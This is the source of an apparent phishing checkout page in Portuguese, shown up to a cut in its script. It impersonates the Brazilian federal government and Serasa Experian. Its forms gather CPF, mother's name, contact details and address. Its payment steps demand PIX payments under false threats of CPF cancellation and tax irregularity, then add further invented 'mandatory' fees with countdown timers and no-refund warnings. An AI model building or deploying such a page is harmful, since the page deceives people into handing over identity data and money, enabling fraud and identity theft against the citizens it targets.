<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Checkout</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/toastify-js/src/toastify.min.css">
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/toastify-js"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        'gov-blue': '#071D41',
                        'gov-blue-light': '#1351B4',
                        'gov-green': '#168821',
                        'gov-yellow': '#FFCD07',
                        'gov-gray': '#555555'
                    }
                }
            }
        }
        </script>

<style id="polish-pack">
  :root{
    --ink:#111827;
    --muted:#6b7280;
    --card:#ffffff;
    --ring: rgba(236,9,120,0.30);
    --ok:#16a34a;
    --danger:#ef4444;
    --brand:#ec0978;
    --brand-hover:#d2086b;
  }
  body{ color:var(--ink); }

  .container .bg-white,
  .max-w-2xl.bg-white,
  #formStep5 .bg-white,
  #formStep6 .bg-gray-50,
  #formStep4 .bg-gray-50,
  #formStep3 .bg-gray-50 {
    border-radius:16px;
    box-shadow:
      0 10px 30px rgba(0,0,0,.06),
      0 4px 12px rgba(236,9,120,.10);
    border:1px solid rgba(236,9,120,.12);
  }

  h2,h3{ letter-spacing:.2px }
  #formStep3 h3, #formStep4 h2, #formStep5 h2, #formStep6 h2 { 
    text-rendering: optimizeLegibility;
  }

  .bg-\[\#ec0978\],
  .bg-gov-green,
  .bg-red-500,
  .bg-gov-blue-light {
    transition: transform .06s ease, box-shadow .2s ease, filter .2s ease;
    box-shadow: 0 10px 24px rgba(236,9,120,.18);
  }
  .bg-\[\#ec0978\]:hover{ filter:brightness(.98) }
  .bg-\[\#ec0978\]:active,
  .bg-gov-green:active,
  .bg-red-500:active,
  .bg-gov-blue-light:active { transform: translateY(1px) }
  .bg-gov-green { box-shadow: 0 10px 24px rgba(22,136,33,.18) }
  .bg-red-500   { box-shadow: 0 10px 24px rgba(239,68,68,.18) }
  .bg-gov-blue-light { box-shadow: 0 10px 24px rgba(19,81,180,.18) }

  input, select, textarea {
    border-radius:10px !important;
    border:1px solid #e5e7eb !important;
    transition: box-shadow .2s, border-color .2s;
  }
  input:focus, select:focus, textarea:focus {
    border-color: var(--brand) !important;
    box-shadow: 0 0 0 4px var(--ring) !important;
    outline: none;
  }

  #step1 div, #step2 div, #step3 div {
    transition: background-color .2s, box-shadow .2s, transform .06s;
    box-shadow: 0 6px 14px rgba(19,81,180,.18);
  }
  #step1 div:hover, #step2 div:hover, #step3 div:hover { transform: translateY(-1px) }

  #formStep4 #qrcode, #formStep4 #qrcode-mobile {
    border-radius:12px;
    border:1px dashed rgba(0,0,0,.08);
    padding:8px;
    background: #fff;
  }
  #formStep4 .bg-gray-50 .text-\[\#ec0978\] { letter-spacing:.2px }
  #timer{
    display:inline-block;
    background:#fff;
    padding:6px 10px;
    border-radius:10px;
    border:1px solid rgba(236,9,120,.18);
    box-shadow:0 6px 14px rgba(236,9,120,.12);
  }

  #pixCode, #pixCodeUpsell {
    font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
    letter-spacing:.3px;
  }
  button[onclick^="copiarPix"]{
    box-shadow: 0 10px 24px rgba(236,9,120,.18);
  }

  .bg-yellow-50 { border:1px solid #fde68a }
  .bg-red-50    { border:1px solid #fecaca }

  #formStep5 .bg-white {
    position: relative;
    overflow: hidden;
  }
  #formStep5 .bg-white::after{
    content:"";
    position:absolute; inset:0;
    background:
      radial-gradient(800px 200px at 100% 0, rgba(236,9,120,.06), transparent 60%),
      linear-gradient(180deg, rgba(236,9,120,.04), transparent 35%);
    pointer-events:none;
  }

  #upsellDIFF h3{
    color: var(--brand) !important;
    letter-spacing:.2px;
  }
  #upsellDIFF .text-gov-gray{
    color:#374151 !important;
  }
  #upsellDIFF .text-3xl{
    color:var(--brand);
    text-shadow:0 1px 0 rgba(0,0,0,.03);
  }
  #upsellDIFF .bg-red-500{
    background: linear-gradient(180deg, var(--brand), var(--brand-hover)) !important;
    border:1px solid rgba(255,255,255,.26);
  }
  #upsellDIFF .bg-red-500:hover{ filter:brightness(.98) }

  #upsellDIFF li, #upsellRG li, #upsellCNH li {
    align-items: flex-start !important;
  }
  #upsellDIFF li svg, #upsellRG li svg, #upsellCNH li svg {
    flex-shrink:0;
    filter: drop-shadow(0 2px 6px rgba(239,68,68,.18));
  }

  #formStep6 .bg-gray-50, #formStep5 .bg-yellow-50, #formStep5 .bg-red-50{
    border-radius:12px;
    backdrop-filter:saturate(1.1);
  }

  #formStep7 .bg-gov-green{
    box-shadow: 0 14px 34px rgba(22,136,33,.18);
  }

  a:focus-visible, button:focus-visible {
    outline: none;
    box-shadow: 0 0 0 4px var(--ring), 0 10px 24px rgba(236,9,120,.18);
    border-radius: 10px;
  }

  @media (max-width: 768px){
    .container .p-6, .max-w-2xl .p-6 { padding: 18px }
    #formStep4 .space-y-4 > * { margin-top: 12px }
  }
</style>


<style id="polish-fixes">
  /* 1) Unificar cores do upsell e PIX para a paleta rosa */
  #formStep5 .bg-gov-blue-light,
  #formStep6 .bg-gov-blue-light {
    background: var(--brand) !important;
    color: #fff !important;
    box-shadow: 0 10px 24px rgba(236,9,120,.18);
  }
  #formStep4 .text-gov-blue,
  #formStep6 .text-gov-blue {
    color: var(--brand) !important;
  }

  /* 2) Remover o brilho decorativo que pode parecer um retângulo/pílula */
  #formStep5 .bg-white::after { content: none !important; }
  #formStep6 .bg-white::after { content: none !important; }

  /* 3) Garantir que headers dos steps tenham mesma tipografia/altura sem artefato */
  #formStep5 h2, #formStep6 h2 {
    line-height: 1.2;
    margin: 0;
  }

  /* 4) Sutileza no contorno dos cartões para não parecer "mancha" no topo */
  #formStep5 .bg-white, #formStep6 .bg-gray-50 {
    box-shadow:
      0 8px 24px rgba(0,0,0,.05),
      0 2px 8px rgba(236,9,120,.10) !important;
    border: 1px solid rgba(236,9,120,.10) !important;
  }

  /* 5) PIX headings alinhados com a marca */
  #formStep4 .text-\[\#ec0978\], #formStep6 .text-gov-blue {
    font-weight: 700;
    letter-spacing: .2px;
  }
</style>

</head>
<body class="bg-gray-50">
    <!-- Header igual ao index.html -->
    <header>
        <div class="shadow-md bg-white">
            <nav class="container mx-auto px-4 py-3 flex items-center justify-between">
                <img src="ldm35XPLW2NcUGzb7E9fszERbUwLwiemzJzsd9Ht-300x127.png" alt="Governo Federal" class="h-8">
                <div class="hidden md:flex space-x-8">
                    <a href="/" class="text-gov-blue-light hover:text-gov-blue transition py-2">Voltar ao início</a>
                </div>
            </nav>
        </div>
    </header>

    <main class="container mx-auto px-4 py-8">
        <!-- Progress Bar -->
        <div class="max-w-3xl mx-auto mb-8">
            <div class="flex justify-between items-center relative max-w-md mx-auto">
    <div class="absolute left-0 right-0 top-1/2 h-0.5 bg-gray-200 -translate-y-1/2"></div>
    
    <!-- Step 1 -->
    <div id="step1" class="relative z-10 flex flex-col items-center">
        <div class="w-8 h-8 bg-gov-blue-light text-white rounded-full flex items-center justify-center text-sm">
            <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M16 7a4 4 0 11-8 0 4 4 0 018 0zM12 14a7 7 0 00-7 7h14a7 7 0 00-7-7z"></path>
            </svg>
        </div>
    </div>

    <!-- Step 2 -->
    <div id="step2" class="relative z-10 flex flex-col items-center">
        <div class="w-8 h-8 bg-gov-blue-light text-white rounded-full flex items-center justify-center text-sm">
            <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M3 12l2-2m0 0l7-7 7 7M5 10v10a1 1 0 001 1h3m10-11l2 2m-2-2v10a1 1 0 01-1 1h-3m-6 0a1 1 0 001-1v-4a1 1 0 011-1h2a1 1 0 011 1v4a1 1 0 001 1m-6 0h6"></path>
            </svg>
        </div>
    </div>

    <!-- Step 3 -->
    <div id="step3" class="relative z-10 flex flex-col items-center">
        <div class="w-8 h-8 bg-gov-blue-light text-white rounded-full flex items-center justify-center text-sm">
            <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M17 9V7a2 2 0 00-2-2H5a2 2 0 00-2 2v6a2 2 0 002 2h2m2 4h10a2 2 0 002-2v-6a2 2 0 00-2-2H9a2 2 0 00-2 2v6a2 2 0 002 2z"></path>
            </svg>
        </div>
    </div>
</div>

        </div>

        <!-- Loading Overlay -->
        <div id="loadingOverlay" class="fixed inset-0 bg-black bg-opacity-50 hidden flex items-center justify-center z-50">
            <div class="bg-white p-6 rounded-lg flex flex-col items-center">
                <div class="animate-spin rounded-full h-12 w-12 border-b-2 border-gov-blue-light mb-4"></div>
                <p class="text-gov-gray">Gerando código PIX...</p>
            </div>
        </div>

        <!-- Modal de Análise -->
        <div id="analiseModal" class="fixed inset-0 bg-black bg-opacity-50 hidden flex items-center justify-center z-50">
            <div class="bg-white p-6 rounded-lg max-w-md">
                <h3 class="text-xl font-bold text-gov-blue mb-4">Pagamento em Análise</h3>
                <p class="text-gov-gray mb-4">
                    Seu pagamento está em análise. Você receberá a confirmação em até 48 horas no email cadastrado.
                </p>
                <p class="text-gov-gray mb-4">
                    A seleção das datas para emissão dos documentos só será liberada após a confirmação do pagamento da guia oficial.
                </p>
                <button onclick="window.location.href='index.html'" class="w-full bg-gov-blue-light text-white py-2 rounded">
                    Voltar ao Início
                </button>
            </div>
        </div>

       <!-- Formulários -->
<div class="max-w-2xl mx-auto bg-white border p-6">
    <!-- Etapa 1: Identificação -->
    <form id="formStep1" class="space-y-4">
        <div class="bg-[#ec0978] text-white p-2 mb-6">
            <h2 class="text-lg font-medium">Dados Pessoais</h2>
        </div>
        <div class="bg-yellow-50 p-4 rounded-lg mb-6">
            <p class="text-gov-gray">
                <strong>Importante:</strong> Por favor, preencha seus dados corretamente para evitar conflitos ou divergências nas informações..
            </p>
        </div>
        <div>
            <label class="block text-gov-gray mb-1 text-sm">Nome Completo</label>
            <input type="text" name="nome" class="w-full p-2 border" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">CPF</label>
            <input type="tel" name="cpf" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Nome da Mãe</label>
            <input type="text" name="nomeMae" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Email</label>
            <input type="email" name="email" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Telefone</label>
            <input type="tel" name="telefone" class="w-full p-3 border rounded-lg" required>
        </div>
        <button 
            type="button" 
            onclick="nextStep(2)" 
            class="w-full bg-[#ec0978] text-white py-2 hover:bg-[#d2086b]"
        >
            Próximo
        </button>
    </form>
<script>
window.addEventListener('DOMContentLoaded', () => {
    const params = new URLSearchParams(window.location.search);
    const form = document.getElementById('formStep1');

    if (params.has('nome')) form.nome.value = params.get('nome');
    if (params.has('cpf')) form.cpf.value = params.get('cpf');
    if (params.has('mae')) form.nomeMae.value = params.get('mae');
    if (params.has('email')) form.email.value = params.get('email');
    if (params.has('telefone')) form.telefone.value = params.get('telefone');
});
</script>
    <!-- Etapa 2: Endereço -->
    <form id="formStep2" class="hidden space-y-4">
        <div class="bg-[#ec0978] text-white p-2 mb-6">
            <h2 class="text-lg font-medium">Endereço</h2>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">CEP</label>
            <input type="text" id="cep" onblur="buscarCep()" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Rua</label>
            <input type="text" id="rua" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Número</label>
            <input type="text" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Bairro</label>
            <input type="text" id="bairro" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Cidade</label>
            <input type="text" id="cidade" class="w-full p-3 border rounded-lg" required>
        </div>
        <div>
            <label class="block text-gov-gray mb-2">Estado</label>
            <input type="text" id="estado" class="w-full p-3 border rounded-lg" required>
        </div>
        <div class="flex space-x-4">
            <button type="button" onclick="prevStep(1)" class="w-full bg-gray-300 text-gray-700 py-3 rounded hover:bg-gray-400 transition">
                Voltar
            </button>
            <button type="button" onclick="nextStep(3)" class="w-full bg-[#ec0978] text-white py-3 rounded hover:bg-[#d2086b] transition">
                Próximo
            </button>
        </div>
    </form>

    <!-- Etapa 3: Pagamento -->
    <div id="formStep3" class="hidden space-y-4">
        <div class="bg-[#ec0978] text-white p-2 mb-6">
            <h2 class="text-lg font-medium">Pagamento</h2>
        </div>
        <div class="bg-gray-50 p-6 rounded-lg">
            <h3 class="text-xl font-bold text-[#ec0978] mb-4">Resumo do Pedido</h3>
            <div class="space-y-2">
                <p class="flex justify-between">
                    <span class="text-gov-gray">Serviço:</span>
                    <span id="servicoTitulo" class="font-medium"></span>
                </p>
                <p class="flex justify-between">
                    <span class="text-gov-gray">Valor:</span>
                    <span id="servicoValor" class="font-medium"></span>
                </p>
            </div>
        </div>
        
        <div class="bg-yellow-50 p-6 rounded-lg">
            <p class="text-gov-gray"><strong>Importante:</strong> Por se tratar de um serviço de quitação de dívida, o pagamento deve ser realizado via Pix, garantindo maior segurança e rastreabilidade da transação.</p>
        </div>

        <button type="button" onclick="emitirGuia()" class="w-full bg-gov-green text-white py-3 rounded hover:bg-green-700 transition">
            Emitir Guia de Pagamento
        </button>
    </div>

    <!-- Etapa 4: PIX -->
    <div id="formStep4" class="hidden space-y-6">
        <div class="bg-[#ec0978] text-white p-2 mb-6 flex justify-between items-center">
            <h2 class="text-lg font-medium">Pagamento via PIX</h2>
            <button onclick="toggleQRCode()" class="md:hidden bg-white text-[#ec0978] px-4 py-1 rounded-full text-sm hover:bg-gray-100">
                Exibir QR Code
            </button>
        </div>
        
        <div class="text-center space-y-4">
            <div id="qrcode-container" class="hidden md:flex justify-center">
                <img id="qrcode" src="" alt="QR Code PIX" class="w-48 h-48">
            </div>
            <div id="mobile-qrcode" class="hidden md:hidden">
                <img id="qrcode-mobile" src="" alt="QR Code PIX" class="w-48 h-48 mx-auto">
            </div>
            
            <div class="bg-gray-50 p-4 rounded-lg">
                <div class="space-y-2">
                    <div class="flex justify-between items-center">
                        <span class="text-gov-gray">Serviço:</span>
                        <span class="font-medium text-[#ec0978]" id="pixTitulo"></span>
                    </div>
                    <div class="flex justify-between items-center">
                        <span class="text-gov-gray">Valor a pagar:</span>
                        <span class="font-medium text-[#ec0978] text-lg" id="pixValor"></span>
                    </div>
                </div>
            </div>

            <div class="bg-gray-50 p-4 rounded-lg">
                <p class="text-sm font-bold text-[#ec0978] mb-2">Código PIX Copia e Cola</p>
                <div class="flex items-center space-x-2">
                    <input id="pixCode" type="text" readonly class="w-full p-2 border bg-white rounded" />
                    <button onclick="copiarPix()" class="bg-[#ec0978] text-white px-4 py-2 rounded hover:bg-[#d2086b]">
                        Copiar                                
                    </button>
                </div>
            </div>

            <div class="bg-red-50 p-4 rounded-lg text-left">
                <p class="text-gov-gray mb-2"><b>Atenção</b>: O não pagamento desta dívida poderá impedir a realização de novos acordos e, cancelamento do CPF, prejudicando sua situação financeira.</p>                      
            </div>

            <div class="bg-yellow-50 p-4 rounded-lg text-left">
                <p class="font-bold text-gov-gray mb-2">Tempo restante para pagamento:</p>
                <p id="timer" class="text-2xl font-bold text-[#ec0978]"></p>
            </div>

            <div class="border rounded-lg p-6 text-left">
                <h3 class="font-bold text-[#ec0978] mb-6">Como pagar com PIX:</h3>
                <div class="space-y-4">
                    <div class="flex items-center space-x-4">
                        <div class="w-8 h-8 rounded-full bg-[#ec0978] text-white flex items-center justify-center flex-shrink-0">1</div>
                        <p class="text-gov-gray">Abra o app do seu banco</p>
                    </div>
                    <div class="flex items-center space-x-4">
                        <div class="w-8 h-8 rounded-full bg-[#ec0978] text-white flex items-center justify-center flex-shrink-0">2</div>
                        <p class="text-gov-gray">Escolha a opção PIX</p>
                    </div>
                    <div class="flex items-center space-x-4">
                        <div class="w-8 h-8 rounded-full bg-[#ec0978] text-white flex items-center justify-center flex-shrink-0">3</div>
                        <p class="text-gov-gray">Escaneie o QR Code ou cole o código</p>
                    </div>
                    <div class="flex items-center space-x-4">
                        <div class="w-8 h-8 rounded-full bg-[#ec0978] text-white flex items-center justify-center flex-shrink-0">4</div>
                        <p class="text-gov-gray">Confirme as informações e valor</p>
                    </div>
                    <div class="flex items-center space-x-4">
                        <div class="w-8 h-8 rounded-full bg-[#ec0978] text-white flex items-center justify-center flex-shrink-0">5</div>
                        <p class="text-gov-gray">Conclua o pagamento</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


            <!-- Etapa 5: Upsell -->
            <div id="formStep5" class="hidden space-y-6">
                <div class="bg-gov-blue-light text-white p-2 mb-6">
                    <h2 class="text-lg font-medium">Pagamento Obrigatório</h2>
                </div>
                
                <!-- Upsell RG -->
                <div id="upsellRG" class="hidden space-y-6">
                    <div class="bg-red-50 p-4 rounded-lg mb-4">
                        <p class="text-gov-gray">
                            <strong>Atenção!</strong> Seu pagamento foi confirmado. Você precisa realizar o pagamento da taxa para emissão da identidade digital.
                        </p>
                    </div>
                    
                    <div class="bg-white border rounded-lg p-6">
                        <div class="flex items-start space-x-4">
                            <div class="bg-red-500 rounded-full p-3 text-white">
                                <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z"></path>
                                </svg>
                            </div>
                            <div class="flex-1">
                                <h3 class="text-xl font-bold text-red-500 mb-2">Pagamento Obrigatório</h3>
                                <p class="text-gray-700 mb-4">
                                    O pagamento da taxa para emissão da nova carteira digital é obrigatório. 
                                    Caso o pagamento não seja efetuado, o agendamento será cancelado 
                                    <strong>sem direito à devolução do valor pago anteriormente</strong>.
                                </p>
                                <ul class="space-y-2 mb-6">
                                    <li class="flex items-center text-gray-700">
                                        <svg class="w-5 h-5 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                                        </svg>
                                        Obrigatório para validação
                                    </li>
                                    <li class="flex items-center text-gray-700">
                                        <svg class="w-5 h-5 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                                        </svg>
                                        Sem devolução em caso de cancelamento
                                    </li>
                                </ul>
                                <div class="text-center">
                                    <p class="text-3xl font-bold text-red-500 mb-4">R$ 47,87</p>
                                    <button onclick="adquirirUpsell('RG')" class="w-full bg-red-500 text-white py-3 rounded-lg hover:bg-red-600 transition">
                                        Realizar Pagamento
                                    </button>
                                </div>
                            </div>
                        </div>
                        
                    </div>
                </div>
                <div id="upsellDIFF" class="hidden space-y-6">
                    <div class="bg-yellow-50 p-4 rounded-lg mb-4">
                        <p class="text-gov-gray">
                            <strong>Atenção!</strong> CPF IRREGULAR NA RECEITA FEDERAL.
                        </p>
                    </div>
                    
                    <div class="bg-white border rounded-lg p-6">
                        <div class="flex items-start space-x-4">
                            <div class="bg-red-500 rounded-full p-3 text-white">
                                <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z"></path>
                                </svg>
                            </div>
                            <div class="flex-1">
    <h3 class="text-xl font-bold text-[#ec0978] mb-2">Pagamento Obrigatório</h3>
    <p class="text-gray-700 mb-4">
                                    Identificamos uma pendência fiscal crítica vinculada ao seu CPF nos registros da Receita Federal. 
                                    <strong>Caso a regularização não seja concluída imediatamente, o impacto será irreversível.</strong>.
                                </p>
                                <ul class="space-y-2 mb-6">
                                    <li class="flex items-center text-gray-700">
                                        <svg class="w-5 h-5 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                                        </svg>
                                        Obrigatório para validação
                                    </li>
                                    <li class="flex items-center text-gray-700">
                                        <svg class="w-5 h-5 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                                        </svg>
                                        Sem devolução em caso de cancelamento
                                    </li>
                                </ul>
                                <div class="text-center">
                                    <p class="text-3xl font-bold text-red-500 mb-4">R$ 42,21</p>
                                    <button onclick="adquirirUpsell('CNH')" class="w-full bg-red-500 text-white py-3 rounded-lg hover:bg-red-600 transition">
                                        Realizar Pagamento
                                    </button>
                                </div>
                            </div>
                        </div>
                        
                    </div>
                </div>
                <!-- Upsell CNH -->
                <div id="upsellCNH" class="hidden space-y-6">
                    <div class="bg-yellow-50 p-4 rounded-lg mb-4">
                        <p class="text-gov-gray">
                            <strong>Parabéns!</strong> Seu pagamento foi confirmado.
                        </p>
                    </div>
                    
                    <div class="bg-white border rounded-lg p-6">
                        <div class="flex items-start space-x-4">
                            <div class="bg-red-500 rounded-full p-3 text-white">
                                <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M19 21V5a2 2 0 00-2-2H7a2 2 0 00-2 2v16m14 0h2m-2 0h-5m-9 0H3m2 0h5M9 7h1m-1 4h1m4-4h1m-1 4h1m-5 10v-5a1 1 0 011-1h2a1 1 0 011 1v5m-4 0h4"></path>
                                </svg>
                            </div>
                            <div class="flex-1">
                                <h3 class="text-xl font-bold text-red-500 mb-2">Exame Médico Obrigatório</h3>
                                <p class="text-gray-700 mb-4">
                                    O exame médico é obrigatório para emissão da sua CNH. Caso o pagamento não seja efetuado, 
                                    o agendamento será cancelado e você ficará impedido de solicitar um novo agendamento por <strong>1 ano</strong>.
                                </p>
                                <ul class="space-y-2 mb-6">
                                    <li class="flex items-center text-gray-700">
                                        <svg class="w-5 h-5 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                                        </svg>
                                        Obrigatório para prosseguir
                                    </li>
                                    <li class="flex items-center text-gray-700">
                                        <svg class="w-5 h-5 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                                        </svg>
                                        Sem reembolso em caso de cancelamento
                                    </li>                                    
                                </ul>
                                <div class="text-center">
                                    <p class="text-3xl font-bold text-red-500 mb-4">R$ 127,31</p>
                                    <button onclick="adquirirUpsell('CNH')" class="w-full bg-red-500 text-white py-3 rounded-lg hover:bg-red-600 transition">
                                        Realizar Pagamento
                                    </button>
                                </div>
                            </div>
                        </div>
                        
                    </div>
                </div>
            </div>

            <!-- Etapa 6: Pagamento Upsell -->
            <div id="formStep6" class="hidden space-y-6">
                <div class="bg-[#ec0978] text-white p-2 mb-6">
    <h2 class="text-lg font-medium">Pagamento do Adicional</h2>
                    <button onclick="toggleQRCodeUpsell()" class="md:hidden bg-white text-gov-blue-light px-4 py-1 rounded-full text-sm hover:bg-gray-100">
                        Exibir QR Code
                    </button>
                </div>
                
                <div class="text-center space-y-4">
                    <div id="qrcode-container-upsell" class="hidden md:flex justify-center">
                        <img id="qrcode-upsell" src="" alt="QR Code PIX" class="w-48 h-48">
                    </div>
                    <div id="mobile-qrcode-upsell" class="hidden md:hidden">
                        <img id="qrcode-mobile-upsell" src="" alt="QR Code PIX" class="w-48 h-48 mx-auto">
                    </div>
                    
                    <div class="bg-gray-50 p-4 rounded-lg">
                        <div class="space-y-2">
                            <div class="flex justify-between items-center">
                                <span class="text-gov-gray">Serviço:</span>
                                <span class="font-medium text-gov-blue" id="pixTituloUpsell"></span>
                            </div>
                            <div class="flex justify-between items-center">
                                <span class="text-gov-gray">Valor a pagar:</span>
                                <span class="font-medium text-gov-blue text-lg" id="pixValorUpsell"></span>
                            </div>
                        </div>
                    </div>

                    <div class="bg-gray-50 p-4 rounded-lg">
                        <p class="text-sm font-bold text-gov-blue mb-2">Código PIX Copia e Cola</p>
                        <div class="flex items-center space-x-2">
                            <input id="pixCodeUpsell" type="text" readonly class="w-full p-2 border bg-white rounded" />
                                <button onclick="copiarPixUpsell()" class="bg-[#ec0978] text-white px-4 py-2 rounded hover:bg-[#d2086b]">Copiar</button>
                        </div>
                    </div>

                    <div class="bg-yellow-50 p-4 rounded-lg text-left">
                        <p class="font-bold text-gov-gray mb-2">Tempo restante para pagamento:</p>
                        <p id="timerUpsell" class="text-2xl font-bold text-gov-blue"></p>
                    </div>

                    <div class="border rounded-lg p-6 text-left">
                        <h3 class="font-bold text-gov-blue mb-6">Como pagar com PIX:</h3>
                        <div class="space-y-4">
                            <div class="flex items-center space-x-4">
                                <div class="w-8 h-8 rounded-full bg-gov-blue-light text-white flex items-center justify-center flex-shrink-0">1</div>
                                <p class="text-gov-gray">Abra o app do seu banco</p>
                            </div>
                            <div class="flex items-center space-x-4">
                                <div class="w-8 h-8 rounded-full bg-gov-blue-light text-white flex items-center justify-center flex-shrink-0">2</div>
                                <p class="text-gov-gray">Escolha a opção PIX</p>
                            </div>
                            <div class="flex items-center space-x-4">
                                <div class="w-8 h-8 rounded-full bg-gov-blue-light text-white flex items-center justify-center flex-shrink-0">3</div>
                                <p class="text-gov-gray">Escaneie o QR Code ou cole o código</p>
                            </div>
                            <div class="flex items-center space-x-4">
                                <div class="w-8 h-8 rounded-full bg-gov-blue-light text-white flex items-center justify-center flex-shrink-0">4</div>
                                <p class="text-gov-gray">Confirme as informações e valor</p>
                            </div>
                            <div class="flex items-center space-x-4">
                                <div class="w-8 h-8 rounded-full bg-gov-blue-light text-white flex items-center justify-center flex-shrink-0">5</div>
                                <p class="text-gov-gray">Conclua o pagamento</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <!-- Etapa 7: Agradecimento -->
            <div id="formStep7" class="hidden space-y-6">
                <div class="bg-gov-green text-white p-4 rounded-lg text-center">
                    <svg class="w-16 h-16 mx-auto mb-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"></path>
                    </svg>
                    <h2 class="text-2xl font-bold mb-2">Pagamento de Taxas Realizada com Sucesso!</h2>
                    <p class="mt-4">Você receberá as instruções de acesso por email em até 24 horas.</p>
                </div>
            </div>
        </div>
    </main>

    <!-- Footer igual ao index.html -->
    <footer class="bg-pink-50 text-gray-800 py-12 mt-8">
    <div class="container mx-auto px-4">
        <div class="flex flex-col items-center text-center">
            <img src="ldm35XPLW2NcUGzb7E9fszERbUwLwiemzJzsd9Ht-300x127.png" alt="Governo Federal" class="h-12 mb-8">
            <div>
                <p class="text-lg mb-2">Portal Oficial</p>
                <p class="text-sm opacity-80">Nós protegemos a sua privacidade🔒</p>
            </div>
        </div>
        <div class="border-t border-pink-200 mt-8 pt-8 text-center">
            <p>© Serasa Experian | Todos os direitos reservados</p>
        </div>
    </div>
</footer>


    <script>
        // Pegar parâmetros da URL
        const urlParams = new URLSearchParams(window.location.search);
        const titulo = urlParams.get('titulo');
        const valor = urlParams.get('valor');

        // Preencher informações do serviço
        document.getElementById('servicoTitulo').textContent = titulo;
        document.getElementById('servicoValor').textContent = `R$ ${valor}`;

        // Funções de validação
        function validarCPF(cpf) {
            cpf = cpf.replace(/[^\d]/g, '');
            if (cpf.length !== 11) return false;
            
            // Verifica CPFs com dígitos iguais
            if (/^(\d)\1{10}$/.test(cpf)) return false;
            
            let soma = 0;
            for (let i = 0; i < 9; i++) {
                soma += parseInt(cpf.charAt(i)) * (10 - i);
            }
            let resto = 11 - (soma % 11);
            let dv1 = resto > 9 ? 0 : resto;
            
            soma = 0;
            for (let i = 0; i < 10; i++) {
                soma += parseInt(cpf.charAt(i)) * (11 - i);
            }
            resto = 11 - (soma % 11);
            let dv2 = resto > 9 ? 0 : resto;
            
            return dv1 === parseInt(cpf.charAt(9)) && dv2 === parseInt(cpf.charAt(10));
        }

        function validarEmail(email) {
            const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return re.test(email);
        }

        function validarTelefone(telefone) {
            telefone = telefone.replace(/[^\d]/g, '');
            return telefone.length >= 10 && telefone.length <= 11;
        }

        function formatarCPF(input) {
            let value = input.value.replace(/\D/g, '');
            if (value.length > 11) value = value.slice(0, 11);
            value = value.replace(/(\d{3})(\d)/, '$1.$2');
            value = value.replace(/(\d{3})(\d)/, '$1.$2');
            value = value.replace(/(\d{3})(\d{1,2})$/, '$1-$2');
            input.value = value;
        }

        function formatarTelefone(input) {
            let value = input.value.replace(/\D/g, '');
